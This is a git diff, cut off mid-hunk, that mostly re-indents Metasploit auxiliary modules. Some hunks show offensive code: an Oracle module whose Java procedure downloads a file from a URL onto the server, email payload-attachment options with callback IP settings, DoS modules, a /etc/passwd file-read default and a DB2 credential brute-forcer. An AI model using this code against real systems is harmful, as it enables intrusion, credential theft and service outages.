diff --git a/lib/rex/ole/header.rb b/lib/rex/ole/header.rb index 59bfcbc1ab..478c086c69 100644 --- a/lib/rex/ole/header.rb +++ b/lib/rex/ole/header.rb @@ -91,7 +91,7 @@ class Header ret << ",\n" if (@_csectFat) - ret << " _csectFat => 0x%08x" % @_csectFat + ret << " _csectFat => 0x%08x" % @_csectFat else ret << " _csectFat => UNALLOCATED" end diff --git a/lib/rex/ole/storage.rb b/lib/rex/ole/storage.rb index 57c2cf5874..cb532f3d49 100644 --- a/lib/rex/ole/storage.rb +++ b/lib/rex/ole/storage.rb @@ -174,7 +174,7 @@ class Storage @header.write @fd write_user_data - # NOTE: we call write_stream here since we MUST write this to + # NOTE: we call write_stream here since we MUST write this to # the regular stream (regardless of size) ms_start = write_stream(@ministream) @directory.set_ministream_params(ms_start, @ministream.length) @@ -249,7 +249,7 @@ class Storage @directory.each_entry { |stm| # only regular streams this pass next if (stm.type != STGTY_STREAM) - + if (stm.length >= @header._ulMiniSectorCutoff) stm.start_sector = write_stream(stm) else diff --git a/modules/auxiliary/admin/backupexec/registry.rb b/modules/auxiliary/admin/backupexec/registry.rb index 754f84eb8f..fb7d3a5fac 100644 --- a/modules/auxiliary/admin/backupexec/registry.rb +++ b/modules/auxiliary/admin/backupexec/registry.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary 'Version' => '$Revision$', 'References' => [ - [ 'OSVDB', '17627' ], + [ 'OSVDB', '17627' ], [ 'CVE', '2005-0771' ], [ 'URL', 'http://www.idefense.com/application/poi/display?id=269&type=vulnerabilities'], ], @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary return { "regread" => "Read a registry value", # "regenum" => "Enumerate registry keys", - } + } end def run diff --git a/modules/auxiliary/admin/http/tomcat_administration.rb b/modules/auxiliary/admin/http/tomcat_administration.rb index ab7ad11957..099dde236e 100644 --- a/modules/auxiliary/admin/http/tomcat_administration.rb +++ b/modules/auxiliary/admin/http/tomcat_administration.rb @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => '/admin/j_security_check', 'method' => 'POST', - 'content-type' => 'application/x-www-form-urlencoded', + 'content-type' => 'application/x-www-form-urlencoded', 'cookie' => "JSESSIONID=#{jsessionid}", 'data' => post_data, }, 25) diff --git a/modules/auxiliary/admin/ms/ms08_059_his2006.rb b/modules/auxiliary/admin/ms/ms08_059_his2006.rb index 49930b9329..bbb9e82650 100644 --- a/modules/auxiliary/admin/ms/ms08_059_his2006.rb +++ b/modules/auxiliary/admin/ms/ms08_059_his2006.rb @@ -88,6 +88,7 @@ class Metasploit3 < Msf::Auxiliary end end + =begin /* * IDL code generated by mIDA v1.0.8 diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb index 37f3b46e80..8559b4a610 100644 --- a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb @@ -41,34 +41,36 @@ class Metasploit3 < Msf::Auxiliary def run return if not check_dependencies - java = " - CREATE OR REPLACE JAVA SOURCE NAMED SRC_FILE_UPLOAD AS - import java.lang.*; - import java.io.*; - public class FileUpload - { - public static void fileUpload(String myFile, String url) throws IOException - { - File binaryFile = new File(myFile); - FileOutputStream outStream = new FileOutputStream(binaryFile); - java.net.URL u = new java.net.URL(url); - java.net.URLConnection uc = u.openConnection(); - InputStream is = (InputStream)uc.getInputStream(); - BufferedReader in = new BufferedReader (new InputStreamReader (is)); - byte buffer[] = new byte[1024]; - int length = -1; - while ((length = is.read(buffer)) != -1) { + java = <<-EOF +CREATE OR REPLACE JAVA SOURCE NAMED SRC_FILE_UPLOAD AS +import java.lang.*; +import java.io.*; +public class FileUpload +{ + public static void fileUpload(String myFile, String url) throws IOException + { + File binaryFile = new File(myFile); + FileOutputStream outStream = new FileOutputStream(binaryFile); + java.net.URL u = new java.net.URL(url); + java.net.URLConnection uc = u.openConnection(); + InputStream is = (InputStream)uc.getInputStream(); + BufferedReader in = new BufferedReader (new InputStreamReader (is)); + byte buffer[] = new byte[1024]; + int length = -1; + while ((length = is.read(buffer)) != -1) { outStream.write(buffer, 0, length); - outStream.flush(); } - is.close(); outStream.close(); - } };; - " + outStream.flush(); + } + is.close(); outStream.close(); + } +};; +EOF - procedure = " - CREATE OR REPLACE PROCEDURE PROC_FILEUPLOAD (p_file varchar2, p_url varchar2) - as language java - NAME 'FileUpload.fileUpload (java.lang.String, java.lang.String)'; - " + procedure = <<-EOF +CREATE OR REPLACE PROCEDURE PROC_FILEUPLOAD (p_file varchar2, p_url varchar2) +as language java +NAME 'FileUpload.fileUpload (java.lang.String, java.lang.String)'; +EOF exec = "begin PROC_FILEUPLOAD ('#{datastore['COPYTO']}', '#{datastore['URL']}'); end;" diff --git a/modules/auxiliary/admin/oracle/sid_brute.rb b/modules/auxiliary/admin/oracle/sid_brute.rb index 1e82d7244e..4e4ba07643 100644 --- a/modules/auxiliary/admin/oracle/sid_brute.rb +++ b/modules/auxiliary/admin/oracle/sid_brute.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'URL', 'https://www.metasploit.com/users/mc' ], [ 'URL' , 'http://www.red-database-security.com/scripts/sid.txt' ], @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary res = sock.get_once(-1,3) disconnect - if ( res and res =~ /ERROR_STACK/ ) + if ( res and res =~ /ERROR_STACK/ ) '' else report_note( diff --git a/modules/auxiliary/admin/oracle/tnscmd.rb b/modules/auxiliary/admin/oracle/tnscmd.rb index 364ae4cc19..ce4b0ea230 100644 --- a/modules/auxiliary/admin/oracle/tnscmd.rb +++ b/modules/auxiliary/admin/oracle/tnscmd.rb @@ -26,14 +26,14 @@ class Metasploit3 < Msf::Auxiliary 'Author' => ['MC'], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'DisclosureDate' => 'Feb 1 2009')) - - register_options( - [ - Opt::RPORT(1521), - OptString.new('CMD', [ false, 'Something like ping, version, status, etc..', '(CONNECT_DATA=(COMMAND=VERSION))']), - ], self.class) + 'DisclosureDate' => 'Feb 1 2009' + )) + register_options( + [ + Opt::RPORT(1521), + OptString.new('CMD', [ false, 'Something like ping, version, status, etc..', '(CONNECT_DATA=(COMMAND=VERSION))']), + ], self.class) end def run diff --git a/modules/auxiliary/admin/postgres/postgres_readfile.rb b/modules/auxiliary/admin/postgres/postgres_readfile.rb index c6f1bc6ef8..f210c3798d 100644 --- a/modules/auxiliary/admin/postgres/postgres_readfile.rb +++ b/modules/auxiliary/admin/postgres/postgres_readfile.rb @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptString.new('RFILE', [ true, 'The remote file', '/etc/passwd']) + OptString.new('RFILE', [ true, 'The remote file', '/etc/passwd']) ], self.class) deregister_options( 'SQL', 'RETURN_ROWSET' ) diff --git a/modules/auxiliary/admin/serverprotect/file.rb b/modules/auxiliary/admin/serverprotect/file.rb index 04858afc3e..39cc908a4f 100644 --- a/modules/auxiliary/admin/serverprotect/file.rb +++ b/modules/auxiliary/admin/serverprotect/file.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary "download" => "Download a file", "upload" => "Upload a file", "list" => "List files (not recommended - will crash the driver)", - } + } end def run diff --git a/modules/auxiliary/admin/smb/upload_file.rb b/modules/auxiliary/admin/smb/upload_file.rb index d9dec7f517..ebf3d96fc2 100644 --- a/modules/auxiliary/admin/smb/upload_file.rb +++ b/modules/auxiliary/admin/smb/upload_file.rb @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary fd = simple.open("\\#{datastore['RPATH']}", 'rwct') fd.write(data) fd.close - + print_status("The file has been uploaded to #{datastore['RPATH']}...") end diff --git a/modules/auxiliary/client/smtp/emailer.rb b/modules/auxiliary/client/smtp/emailer.rb index a9a2129f78..092ba0e49c 100644 --- a/modules/auxiliary/client/smtp/emailer.rb +++ b/modules/auxiliary/client/smtp/emailer.rb @@ -67,15 +67,15 @@ class Metasploit3 < Msf::Auxiliary attachment_file_type = yamlconf['attachment_file_type'] attachment_file_name = yamlconf['attachment_file_name'] - ### payload options ### - make_payload = yamlconf['make_payload'] - zip_payload = yamlconf['zip_payload'] - msf_port = yamlconf['msf_port'] - msf_ip = yamlconf['msf_ip'] - msf_payload = yamlconf['msf_payload'] - msf_filename = yamlconf['msf_filename'] - msf_change_ext = yamlconf['msf_change_ext'] - msf_payload_ext = yamlconf['msf_payload_ext'] + ### payload options ### + make_payload = yamlconf['make_payload'] + zip_payload = yamlconf['zip_payload'] + msf_port = yamlconf['msf_port'] + msf_ip = yamlconf['msf_ip'] + msf_payload = yamlconf['msf_payload'] + msf_filename = yamlconf['msf_filename'] + msf_change_ext = yamlconf['msf_change_ext'] + msf_payload_ext = yamlconf['msf_payload_ext'] tmp = Dir.tmpdir @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary print_error("YAML config: #{type}") end - if make_payload + if make_payload attachment_file = File.join(tmp, msf_filename) attachment_file_name = msf_filename @@ -132,7 +132,7 @@ class Metasploit3 < Msf::Auxiliary attachment_file_type = 'application/exe' end - end + end File.open(fileto, 'rb').each do |l| diff --git a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb index 8d99f27e1c..b768ba249e 100644 --- a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb +++ b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary a single packet to a vulnerable ntpd server (Victim A), spoofed from the IP address of another vulnerable ntpd server (Victim B), both victims will enter an infinite response loop. - Note, unless you control the spoofed source host or the real + Note, unless you control the spoofed source host or the real remote host(s), you will not be able to halt the DoS condition once begun! }, diff --git a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb index 4ae9808aaf..995b6c4d99 100644 --- a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb +++ b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb @@ -82,10 +82,10 @@ class Metasploit3 < Msf::Auxiliary print_status("Deleting #{datstore['RPATH']}...") if !( - send_file(sock1, 2, "cfA" + jid + r_hostname, control) and - send_file(sock1, 3, "dfa" + jid + r_hostname, dataf) - ) - sock1.close + send_file(sock1, 2, "cfA" + jid + r_hostname, control) and + send_file(sock1, 3, "dfa" + jid + r_hostname, dataf) + ) + sock1.close return end diff --git a/modules/auxiliary/dos/wifi/cts_rts_flood.rb b/modules/auxiliary/dos/wifi/cts_rts_flood.rb index 1a649cdc8b..aef212777d 100644 --- a/modules/auxiliary/dos/wifi/cts_rts_flood.rb +++ b/modules/auxiliary/dos/wifi/cts_rts_flood.rb @@ -80,6 +80,6 @@ class Metasploit3 < Msf::Auxiliary "\xff\x7f" + # Duration eton(datastore['ADDR_DST']) # dst addr - return frame + return frame end end diff --git a/modules/auxiliary/dos/wifi/daringphucball.rb b/modules/auxiliary/dos/wifi/daringphucball.rb index 32969e2338..b7e3ce44e3 100644 --- a/modules/auxiliary/dos/wifi/daringphucball.rb +++ b/modules/auxiliary/dos/wifi/daringphucball.rb @@ -94,19 +94,17 @@ Tested on a 1.0Ghz PowerBook running 10.4.8 with the latest updates (Halloween, Unresolved kernel trap(cpu 0): 0x300 - Data access DAR=0x000000000DEFACF7 PC=0x00000000007A2260 Latest crash info for cpu 0: - Exception state (sv=0x3AA12A00) - PC=0x007A2260; MSR=0x00009030; DAR=0x0DEFACF7; DSISR=0x40000000; LR=0x007A1D48; R1=0x17443B60; XCP=0x0000000C (0x300 - Data access) - Backtrace: -0x01BC80AC 0x007A1D48 0x0079FA54 0x0079FF94 0x0079FEBC 0x002D0B94 - 0x002CFA5C 0x000A9314 - Kernel loadable modules in backtrace (with dependencies): - com.apple.driver.AppleAirPort(3.4.4)@0x797000 - dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x5f8000 + Exception state (sv=0x3AA12A00) + PC=0x007A2260; MSR=0x00009030; DAR=0x0DEFACF7; DSISR=0x40000000; LR=0x007A1D48; R1=0x17443B60; XCP=0x0000000C (0x300 - Data access) + Backtrace: 0x01BC80AC 0x007A1D48 0x0079FA54 0x0079FF94 0x0079FEBC 0x002D0B94 0x002CFA5C 0x000A9314 + Kernel loadable modules in backtrace (with dependencies): + com.apple.driver.AppleAirPort(3.4.4)@0x797000 + dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x5f8000 Proceeding back via exception chain: - Exception state (sv=0x3AA12A00) - previously dumped as "Latest" state. skipping... - Exception state (sv=0x31F13A00) - PC=0x00000000; MSR=0x0000D030; DAR=0x00000000; DSISR=0x00000000; LR=0x00000000; R1=0x00000000; XCP=0x00000000 (Unknown) + Exception state (sv=0x3AA12A00) + previously dumped as "Latest" state. skipping... + Exception state (sv=0x31F13A00) + PC=0x00000000; MSR=0x0000D030; DAR=0x00000000; DSISR=0x00000000; LR=0x00000000; R1=0x00000000; XCP=0x00000000 (Unknown) Kernel version: Darwin Kernel Version 8.8.0: Fri Sep 8 17:18:57 PDT 2006; root:xnu-792.12.6.obj~1/RELEASE_PPC @@ -116,20 +114,20 @@ Darwin Kernel Version 8.8.0: Fri Sep 8 17:18:57 PDT 2006; root:xnu-792.12.6.obj (gdb) showcurrentstacks task vm_map ipc_space #acts pid proc command 0x01a73dd8 0x00cdaf3c 0x01a68ef0 38 0 0x003fb200 kernel_task - activation thread pri state wait_queue wait_event - 0x01a7c000 0x01a7c000 82 R - reserved_stack=0x173b0000 - kernel_stack=0x17440000 - stacktop=0x17443b60 - 0x17443b60 0x1bc80ac - 0x17443be0 0x7a1d48 - 0x17443c60 0x79fa54 - 0x17443ce0 0x79ff94 - 0x17443d90 0x79febc - 0x17443df0 0x2d0b94 <_ZN22IOInterruptEventSource12checkForWorkEv+184> - 0x17443e40 0x2cfa5c <_ZN10IOWorkLoop10threadMainEv+104> - 0x17443e90 0xa9314 - stackbottom=0x17443e90 +activation thread pri state wait_queue wait_event +0x01a7c000 0x01a7c000 82 R +reserved_stack=0x173b0000 +kernel_stack=0x17440000 +stacktop=0x17443b60 +0x17443b60 0x1bc80ac +0x17443be0 0x7a1d48 +0x17443c60 0x79fa54 +0x17443ce0 0x79ff94 +0x17443d90 0x79febc +0x17443df0 0x2d0b94 <_ZN22IOInterruptEventSource12checkForWorkEv+184> +0x17443e40 0x2cfa5c <_ZN10IOWorkLoop10threadMainEv+104> +0x17443e90 0xa9314 +stackbottom=0x17443e90 (gdb) x/3i $pc diff --git a/modules/auxiliary/dos/wifi/deauth.rb b/modules/auxiliary/dos/wifi/deauth.rb index 92d56dbc10..b8f8b99b8b 100644 --- a/modules/auxiliary/dos/wifi/deauth.rb +++ b/modules/auxiliary/dos/wifi/deauth.rb @@ -20,14 +20,15 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'Wireless DEAUTH Flooder', 'Description' => %q{ - This module sends 802.11 DEAUTH requests to a specific wireless peer, - using the specified source address and source BSSID. - }, + This module sends 802.11 DEAUTH requests to a specific wireless peer, + using the specified source address and source BSSID. + }, 'Author' => [ 'Brad Antoniewicz' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$' - )) + )) + register_options( [ OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]), diff --git a/modules/auxiliary/dos/wifi/netgear_wg311pci.rb b/modules/auxiliary/dos/wifi/netgear_wg311pci.rb index a8c2ac4f6d..d468e0ceca 100644 --- a/modules/auxiliary/dos/wifi/netgear_wg311pci.rb +++ b/modules/auxiliary/dos/wifi/netgear_wg311pci.rb @@ -51,25 +51,25 @@ class Metasploit3 < Msf::Auxiliary def run - open_wifi + open_wifi - stime = Time.now.to_i - rtime = datastore['RUNTIME'].to_i - count = 0 + stime = Time.now.to_i + rtime = datastore['RUNTIME'].to_i + count = 0 - print_status("Creating malicious probe response frame...") + print_status("Creating malicious probe response frame...") - frame = create_probe_response() + frame = create_probe_response() - print_status("Sending malicious probe response frames for #{datastore['RUNTIME']} seconds...") + print_status("Sending malicious probe response frames for #{datastore['RUNTIME']} seconds...") - while (stime + rtime > Time.now.to_i) - wifi.write(frame) - select(nil, nil, nil, 0.10) if (count % 100 == 0) - count += 1 - end + while (stime + rtime > Time.now.to_i) + wifi.write(frame) + select(nil, nil, nil, 0.10) if (count % 100 == 0) + count += 1 + end - print_status("Completed sending #{count} probe responses.") + print_status("Completed sending #{count} probe responses.") end def create_probe_response diff --git a/modules/auxiliary/dos/wifi/ssidlist_beacon.rb b/modules/auxiliary/dos/wifi/ssidlist_beacon.rb index 410bdb8b9c..009185ea2f 100644 --- a/modules/auxiliary/dos/wifi/ssidlist_beacon.rb +++ b/modules/auxiliary/dos/wifi/ssidlist_beacon.rb @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + # current channel - "\x03" + "\x01" + channel.chr + "\x03" + "\x01" + channel.chr return frame diff --git a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb index 25a8e1443a..d239c5a24d 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary break end print_error("Exception occurred on interation #{i}") - print_error("Error: #{e.class} > #{e}") + print_error("Error: #{e.class} > #{e}") break end end diff --git a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb index 14eee312ee..8dc903403e 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb @@ -11,10 +11,10 @@ class Metasploit3 < Msf::Auxiliary - include Msf::Exploit::Remote::SMB - include Msf::Auxiliary::Dos + include Msf::Exploit::Remote::SMB + include Msf::Auxiliary::Dos - def initialize(info = {}) + def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft SRV.SYS WriteAndX Invalid DataOffset', 'Description' => %q{ @@ -27,13 +27,15 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'j.v.vallejo[at]gmail.com' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ ['MSB', 'MS09-001'], ['OSVDB', '48153'], ['CVE', '2008-4114'], ['BID', '31179'], - ])) + ] + ) + ) end diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb index e7cfd719d8..099ccb3b9d 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb @@ -11,10 +11,10 @@ class Metasploit3 < Msf::Auxiliary - include Msf::Exploit::Remote::Tcp - include Msf::Auxiliary::Dos + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Dos - def initialize(info = {}) + def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference', 'Description' => %q{ diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb index e8483499bd..395c791005 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb @@ -15,10 +15,10 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - include Msf::Exploit::Remote::Tcp - include Msf::Auxiliary::Dos + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Dos - def initialize(info = {}) + def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference', 'Description' => %q{ diff --git a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb index 9b6b18078d..4f15e2e3be 100644 --- a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb +++ b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb @@ -124,13 +124,13 @@ class Metasploit3 < Msf::Auxiliary if (startstage == 2) process_phase(2, "Fuzzing USER", 'USER ') - startstage += 1 + startstage += 1 end if (startstage == 3) process_phase(3, "Fuzzing PASS", 'PASS ', [ "USER " + datastore['USER'] + "\n" ]) - startstage += 1 + startstage += 1 end if (startstage == 4) @@ -147,7 +147,7 @@ class Metasploit3 < Msf::Auxiliary # Fuzz other commands, all command combinations in one session if startstage == 5 - print_status("[Phase 5] Fuzzing other commands - Part 2 - #{Time.now.localtime}") + print_status("[Phase 5] Fuzzing other commands - Part 2 - #{Time.now.localtime}") @commands.each do |cmd| ecount = 1 count = datastore['STARTSIZE'] @@ -172,8 +172,8 @@ class Metasploit3 < Msf::Auxiliary end rescue ::Exception => e if (e.class.name == 'Rex::ConnectionRefused') or (e.class.name == 'EOFError') or (e.class.name == 'Errno::ECONNRESET') or (e.class.name == 'Errno::EPIPE') - print_status("Crash string : #{cmd} #{evilchr} x #{count}") - print_status("System does not respond - exiting now\n") + print_status("Crash string : #{cmd} #{evilchr} x #{count}") + print_status("System does not respond - exiting now\n") return end print_error("Error: #{e.class} #{e} #{e.backtrace}\n") diff --git a/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb b/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb index ef9695759e..de7f4c7832 100644 --- a/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb +++ b/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb @@ -116,7 +116,7 @@ class Metasploit3 < Msf::Auxiliary "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + # current channel - "\x03" + "\x01" + channel.chr + "\x03" + "\x01" + channel.chr 1.upto(ies) do |i| max = mtu - frame.length diff --git a/modules/auxiliary/gather/dns_enum.rb b/modules/auxiliary/gather/dns_enum.rb index ddd472903b..b260055a9e 100644 --- a/modules/auxiliary/gather/dns_enum.rb +++ b/modules/auxiliary/gather/dns_enum.rb @@ -17,16 +17,16 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS Enumeration Module', - 'Description' => %q{ + 'Name' => 'DNS Enumeration Module', + 'Description' => %q{ This module can be used to enumerate various types of information about a domain from a specific DNS server. - }, - 'Author' => [ 'Carlos Perez ' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ + }, + 'Author' => [ 'Carlos Perez ' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ ['CVE', '1999-0532'], ['OSVDB', '492'], ] diff --git a/modules/auxiliary/scanner/db2/db2_auth.rb b/modules/auxiliary/scanner/db2/db2_auth.rb index f962e1a8fb..5e8af55ded 100644 --- a/modules/auxiliary/scanner/db2/db2_auth.rb +++ b/modules/auxiliary/scanner/db2/db2_auth.rb @@ -31,22 +31,21 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE ) - register_options( - [ + register_options( + [ OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line", - File.join(Msf::Config.install_root, "data", "wordlists", "db2_default_userpass.txt") ]), + File.join(Msf::Config.install_root, "data", "wordlists", "db2_default_userpass.txt") ]), OptPath.new('USER_FILE', [ false, "File containing users, one per line", - File.join(Msf::Config.install_root, "data", "wordlists", "db2_default_user.txt") ]), + File.join(Msf::Config.install_root, "data", "wordlists", "db2_default_user.txt") ]), OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line", - File.join(Msf::Config.install_root, "data", "wordlists", "db2_default_pass.txt") ]), + File.join(Msf::Config.install_root, "data", "wordlists", "db2_default_pass.txt") ]), ], self.class) - end def run_host(ip) - each_user_pass { |user, pass| - do_login(user,pass,datastore['DATABASE']) - } + each_user_pass { |user, pass| + do_login(user,pass,datastore['DATABASE']) + } end def do_login(user=nil,pass=nil,db=nil) @@ -64,24 +63,25 @@ class Metasploit3 < Msf::Auxiliary vprint_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}") return :abort end - disconnect - if info[:db_login_success] - print_good("#{rhost}:#{rport} - DB2 - successful login for '#{user}' : '#{pass}' against database '#{db}'") - # Report credentials - report_auth_info( - :host => rhost, - :port => rport, - :sname => "db2", - :user => "#{db}/#{user}", - :pass => pass, - :active => true + disconnect + + if info[:db_login_success] + print_good("#{rhost}:#{rport} - DB2 - successful login for '#{user}' : '#{pass}' against database '#{db}'") + # Report credentials + report_auth_info( + :host => rhost, + :port => rport, + :sname => "db2", + :user => "#{db}/#{user}", + :pass => pass, + :active => true ) - return :next_user - else - vprint_error("#{rhost}:#{rport} - DB2 - failed login for '#{user}' : '#{pass}' against database '#{db}'") - return :fail - end + return :next_user + else + vprint_error("#{rhost}:#{rport} - DB2 - failed login for '#{user}' : '#{pass}' against database '#{db}'") + return :fail + end end end diff --git a/modules/auxiliary/scanner/db2/discovery.rb b/modules/auxiliary/scanner/db2/discovery.rb index 5deafc169d..b0c2a968fb 100644 --- a/modules/auxiliary/scanner/db2/discovery.rb +++ b/modules/auxiliary/scanner/db2/discovery.rb @@ -37,36 +37,38 @@ class Metasploit3 < Msf::Auxiliary begin - connect_udp + connect_udp udp_sock.put(pkt) res = udp_sock.read(1024).split(/\x00/) - if (res) - report_note( - :host => ip, - :proto => 'udp', - :port => datastore['RPORT'], - :type => 'SERVICE_INFO', - :data => res[2] + "_" + res[1] + if (res) + report_note( + :host => ip, + :proto => 'udp', + :port => datastore['RPORT'], + :type => 'SERVICE_INFO', + :data => res[2] + "_" + res[1] ) - report_service( - :host => ip, - :port => datastore['RPORT'], - :proto => 'udp', - :name => "ibm-db2", - :info => res[2] + "_" + res[1] + report_service( + :host => ip, + :port => datastore['RPORT'], + :proto => 'udp', + :name => "ibm-db2", + :info => res[2] + "_" + res[1] ) - print_status("Host #{ip} node name is " + res[2] + " with a product id of " + res[1] ) - else - print_error("Unable to determine version info for #{ip}") - end + print_status("Host #{ip} node name is " + res[2] + " with a product id of " + res[1] ) + else + print_error("Unable to determine version info for #{ip}") + end + + disconnect_udp - disconnect_udp rescue ::Rex::ConnectionError rescue ::Errno::EPIPE end + end end diff --git a/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb b/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb index f7ce6183e6..cd9371e972 100644 --- a/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb +++ b/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb @@ -301,7 +301,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Interrupt raise $! rescue ::Exception => e - #print_line("UUID #{uuid[0]} #{uuid[1]} ERROR #{$!}") + #print_line("UUID #{uuid[0]} #{uuid[1]} ERROR #{$!}") end disconnect() end diff --git a/modules/auxiliary/scanner/http/axis_local_file_include.rb b/modules/auxiliary/scanner/http/axis_local_file_include.rb index d60172be6d..da5445909e 100644 --- a/modules/auxiliary/scanner/http/axis_local_file_include.rb +++ b/modules/auxiliary/scanner/http/axis_local_file_include.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module exploits an Apache Axis2 v1.4.1 local file inclusion (LFI) vulnerability. By loading a local XML file which contains a cleartext username and password, attackers can trivially - recover authentication credentials to Axis services. + recover authentication credentials to Axis services. }, 'References' => [ diff --git a/modules/auxiliary/scanner/http/blind_sql_query.rb b/modules/auxiliary/scanner/http/blind_sql_query.rb index d425cf2003..5e073aec3c 100644 --- a/modules/auxiliary/scanner/http/blind_sql_query.rb +++ b/modules/auxiliary/scanner/http/blind_sql_query.rb @@ -99,12 +99,12 @@ class Metasploit3 < Msf::Auxiliary begin normalres = send_request_cgi({ - 'uri' => datastore['PATH'], - 'vars_get' => gvars, - 'method' => datastore['METHOD'], + 'uri' => datastore['PATH'], + 'vars_get' => gvars, + 'method' => datastore['METHOD'], 'ctype' => 'application/x-www-form-urlencoded', - 'cookie' => datastore['COOKIE'], - 'data' => datastore['DATA'] + 'cookie' => datastore['COOKIE'], + 'data' => datastore['DATA'] }, 20) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout @@ -183,15 +183,14 @@ class Metasploit3 < Msf::Auxiliary if falseres - #Very simple way to compare responses, this can be improved alot , at this time just the simple way - relfalsesize = falseres.body.length-(falseres.body.scan(/#{tarr[2]}/).length*tarr[2].length) - #true_false_dist = edit_distance(falseres.body,trueres.body) + #Very simple way to compare responses, this can be improved alot , at this time just the simple way + relfalsesize = falseres.body.length-(falseres.body.scan(/#{tarr[2]}/).length*tarr[2].length) + #true_false_dist = edit_distance(falseres.body,trueres.body) + #print_status("rellenf #{relfalsesize}") - #print_status("rellenf #{relfalsesize}") - - if reltruesize > relfalsesize - print_status("Possible #{tarr[0]} Blind SQL Injection Found #{datastore['PATH']} #{key}") + if reltruesize > relfalsesize + print_status("Possible #{tarr[0]} Blind SQL Injection Found #{datastore['PATH']} #{key}") report_note( :host => ip, @@ -200,9 +199,8 @@ class Metasploit3 < Msf::Auxiliary :type => 